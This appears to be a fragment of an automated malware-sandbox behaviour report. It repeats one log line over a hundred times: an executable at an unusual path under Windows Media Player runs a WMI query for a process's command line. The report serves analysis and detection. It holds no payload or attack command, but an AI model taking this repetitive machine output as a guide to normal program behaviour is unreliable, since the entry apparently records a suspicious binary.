                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
